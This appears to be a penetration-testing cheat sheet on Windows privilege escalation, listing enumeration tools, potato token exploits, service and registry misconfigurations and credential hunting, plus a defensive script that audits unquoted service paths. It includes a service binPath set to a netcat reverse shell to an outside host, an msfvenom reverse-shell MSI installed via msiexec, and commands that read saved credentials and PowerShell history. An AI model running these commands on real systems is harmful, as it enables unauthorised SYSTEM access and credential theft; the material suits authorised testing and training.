
Windows Privilege Escalation

Advanced techniques for Windows privilege escalation: Token impersonation, Services, and Registry abuse

1. Automated Enumeration

  • WinPEAS: the best all-rounder.

    ```powershell
    .\winPEASx64.exe quiet cmd fast
    ```

  • Seatbelt: C# enumeration tool.

    ```powershell
    .\Seatbelt.exe -group=all
    ```

  • PowerUp: PowerShell check script.

    ```powershell
    Import-Module .\PowerUp.ps1
    Invoke-AllChecks
    ```

2. Kernel Exploits

  • SystemInfo: check the OS version, build and installed hotfixes.

    ```cmd
    systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
    ```

  • Watson: C# tool that identifies missing KBs.
  • WesNG: Python script that compares systeminfo output against a CVE database.

3. Token Impersonation (Potatoes)

If the current account holds SeImpersonatePrivilege (common for IIS and service accounts), it can be escalated to SYSTEM.

  • Check privs:

    ```cmd
    whoami /priv
    ```

  • Exploits:
    • JuicyPotato (older Windows). Usage: JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t *
    • PrintSpoofer (newer Windows). Abuses the Print Spooler service.

      ```powershell
      .\PrintSpoofer.exe -i -c cmd
      ```

    • RoguePotato / SweetPotato: alternatives if PrintSpoofer fails.
    • GodPotato: supports up to Windows Server 2022.

4. Service Exploitation

Many services run as SYSTEM. If the service binary or its configuration can be modified, whatever replaces it runs as SYSTEM too.

Unquoted Service Paths

If the service path contains spaces and is not quoted (e.g., C:\Program Files\My Service\service.exe), Windows tries each space-delimited prefix in order before reaching the real binary:

  1. C:\Program.exe
  2. C:\Program Files\My.exe

  • Find (cmd.exe; lists Auto-start services outside C:\Windows whose path has no quotes):

    ```cmd
    wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
    ```

  • Exploit: place your malicious binary at an interception point whose directory is writable.
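The same check as an audit script, so that a host's service list can be screened for this misconfiguration offline. This is an added example, not from the original page or any of the tools it names; it assumes the input has the shape of `wmic service get name,pathname,startmode /format:csv` (Node,Name,PathName,StartMode per line), and the sample data is constructed. It generalises the page's single path to any unquoted path, following Windows's prefix-by-prefix search rule.

```python
import ntpath
import os
from typing import Callable, Iterator

# Constructed sample in the shape of wmic's /format:csv output; not from a real host.
SAMPLE_WMIC_CSV = """\
Node,Name,PathName,StartMode
HOST1,Spooler,C:\\Windows\\System32\\spoolsv.exe,Auto
HOST1,MyService,C:\\Program Files\\My Service\\service.exe,Auto
HOST1,GoodSvc,"C:\\Program Files\\Good Vendor\\good.exe" -svc,Auto
HOST1,ManualSvc,C:\\Tools\\Manual Thing\\svc.exe,Manual
HOST1,PlainSvc,C:\\Tools\\plain.exe,Auto
"""

def interception_points(image_path: str) -> list[str]:
    """Executables Windows tries, in order, before the real binary of an
    unquoted path containing spaces; empty for quoted or space-free paths."""
    image_path = image_path.strip()
    if image_path.startswith('"') or " " not in image_path:
        return []
    tokens = image_path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            break  # this prefix is the intended binary itself
        candidates.append(prefix + ".exe")
    return candidates

def parse_wmic_csv(text: str) -> Iterator[tuple[str, str, str]]:
    """Yield (name, pathname, startmode). PathName may contain commas and
    quotes, so split from both ends rather than using the csv module."""
    for line in text.splitlines():
        if not line.strip() or line.startswith("Node,"):
            continue
        _node, name, rest = line.split(",", 2)
        pathname, startmode = rest.rsplit(",", 1)
        yield name, pathname, startmode

def audit_unquoted_services(text: str,
                            is_writable: Callable[[str], bool] = lambda d: os.access(d, os.W_OK)
                            ) -> dict[str, list[tuple[str, bool]]]:
    """Apply the page's filter (Auto start, outside C:\\Windows, unquoted) and
    report each interception point with whether its parent directory is writable.
    os.access is a coarse check; confirm real ACLs with icacls or accesschk."""
    findings: dict[str, list[tuple[str, bool]]] = {}
    for name, pathname, startmode in parse_wmic_csv(text):
        if startmode.strip().lower() != "auto":
            continue
        if pathname.strip().lower().startswith("c:\\windows\\"):
            continue
        points = interception_points(pathname)
        if points:
            findings[name] = [(p, is_writable(ntpath.dirname(p))) for p in points]
    return findings
```

On a real host, feed it the saved output of the wmic command above; only services with a writable interception directory are actually exposed.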

Insecure Service Permissions

If you can modify a service's configuration (its binPath), the service will launch whatever binary you point it at the next time it starts.

  • Check:

    ```cmd
    accesschk.exe -uwcqv "Everyone" *
    ```

  • Exploit (from cmd.exe; in PowerShell `sc` is an alias of Set-Content, so call `sc.exe` there):

    ```cmd
    sc config <service_name> binpath= "C:\nc.exe -e cmd.exe <IP> <PORT>"
    sc stop <service_name>
    sc start <service_name>
    ```

DLL Hijacking

If a service tries to load a DLL that is missing from a directory you can write to, it will load whatever DLL is placed there.

  1. Find: use Process Monitor (procmon) on a local VM replica to spot NAME NOT FOUND results for DLL loads.
  2. Exploit: place the malicious DLL in that path.

5. Registry Attacks

AlwaysInstallElevated

When set to 1 under both HKCU and HKLM, this policy lets any user install MSI packages as SYSTEM.

  • Check:

    ```cmd
    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    ```

  • Exploit:
    • Generate MSI: msfvenom -p windows/x64/shell_reverse_tcp ... -f msi -o shell.msi
    • Run: msiexec /quiet /qn /i shell.msi

AutoRuns

Check the registry keys that run binaries at startup, then check whether the referenced binaries or their directories are writable.

    ```cmd
    accesschk.exe -wvu "C:\Program Files\Autorun app"
    ```

6. Passwords in Files

  • Unattend.xml: often contains base64-encoded admin passwords.

    ```cmd
    dir /s /b c:\*unattend.xml*
    ```

  • PowerShell history:

    ```cmd
    type C:\Users\<User>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
    ```

  • Saved creds: cmdkey /list (if found, use runas /savecred ...)